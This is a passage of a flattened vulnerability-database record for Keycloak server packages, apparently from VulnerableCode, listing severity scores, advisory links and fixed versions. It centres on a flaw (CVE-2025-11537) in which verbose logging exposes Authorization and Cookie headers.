reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-10451
reference_id CVE-2024-10451
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-10451
17
reference_url https://github.com/advisories/GHSA-v7gv-xpgf-6395
reference_id GHSA-v7gv-xpgf-6395
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-v7gv-xpgf-6395
18
reference_url https://github.com/keycloak/keycloak/security/advisories/GHSA-v7gv-xpgf-6395
reference_id GHSA-v7gv-xpgf-6395
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
3
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/security/advisories/GHSA-v7gv-xpgf-6395
fixed_packages
0
url pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
purl pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-13cd-jace-rfdu
1
vulnerability VCID-a1me-1k15-2kdt
2
vulnerability VCID-cax3-qsfb-yfc9
3
vulnerability VCID-hq42-c3pr-qkbf
4
vulnerability VCID-vtut-sg7s-xqf4
5
vulnerability VCID-wgaj-esqz-27fk
6
vulnerability VCID-zv3y-skx5-53ge
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
aliases CVE-2024-10451, GHSA-v7gv-xpgf-6395
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-yqk6-r6s5-myae
13
url VCID-zv3y-skx5-53ge
vulnerability_id VCID-zv3y-skx5-53ge
summary
Keycloak logs sensitive headers
A flaw was found in Keycloak. When the logging format is configured to a verbose, user-supplied pattern (such as the pre-defined 'long' pattern), sensitive headers including Authorization and Cookie are disclosed to the logs in cleartext. An attacker with read access to the log files can extract these credentials (e.g., bearer tokens, session cookies) and use them to impersonate users, leading to a full account compromise.

Patches are available, see:

- https://github.com/keycloak/keycloak/releases/tag/26.4.11
- https://github.com/keycloak/keycloak/releases/tag/26.5.6
- https://github.com/keycloak/keycloak/releases/tag/26.6.0
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-11537.json
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-11537.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-11537
reference_id
reference_type
scores
0
value 6e-05
scoring_system epss
scoring_elements 0.00448
published_at 2026-06-09T12:55:00Z
1
value 6e-05
scoring_system epss
scoring_elements 0.0045
published_at 2026-06-05T12:55:00Z
2
value 6e-05
scoring_system epss
scoring_elements 0.00451
published_at 2026-06-06T12:55:00Z
3
value 6e-05
scoring_system epss
scoring_elements 0.00447
published_at 2026-06-07T12:55:00Z
4
value 6e-05
scoring_system epss
scoring_elements 0.00445
published_at 2026-06-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-11537
2
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2402616
reference_id
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-10T14:26:01Z/
url https://bugzilla.redhat.com/show_bug.cgi?id=2402616
3
reference_url https://github.com/keycloak/keycloak
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak
4
reference_url https://github.com/keycloak/keycloak/commit/137a35c1109ff43a305f26264978a3ea21452373
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/commit/137a35c1109ff43a305f26264978a3ea21452373
5
reference_url https://github.com/keycloak/keycloak/commit/5a3cdb7c4ccbf83ffc926f70d655a60269d7207b
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/commit/5a3cdb7c4ccbf83ffc926f70d655a60269d7207b
6
reference_url https://github.com/keycloak/keycloak/commit/9622f550a6e565b29a3a37454421f08626791a6c
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/commit/9622f550a6e565b29a3a37454421f08626791a6c
7
reference_url https://www.keycloak.org/server/logging#_change_log_formatpattern
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.keycloak.org/server/logging#_change_log_formatpattern
8
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:
reference_id cpe:/a:redhat:build_keycloak:
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:
9
reference_url https://access.redhat.com/security/cve/CVE-2025-11537
reference_id CVE-2025-11537
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-10T14:26:01Z/
url https://access.redhat.com/security/cve/CVE-2025-11537
10
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-11537
reference_id CVE-2025-11537
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-11537
11
reference_url https://github.com/advisories/GHSA-gv3v-2cpp-3pmq
reference_id GHSA-gv3v-2cpp-3pmq
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-gv3v-2cpp-3pmq
fixed_packages
0
url pkg:maven/org.keycloak/keycloak-quarkus-server@26.5.6
purl pkg:maven/org.keycloak/keycloak-quarkus-server@26.5.6
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.5.6
aliases CVE-2025-11537, GHSA-gv3v-2cpp-3pmq
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-zv3y-skx5-53ge
Fixing_vulnerabilities
Risk_score 4.0
Resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.5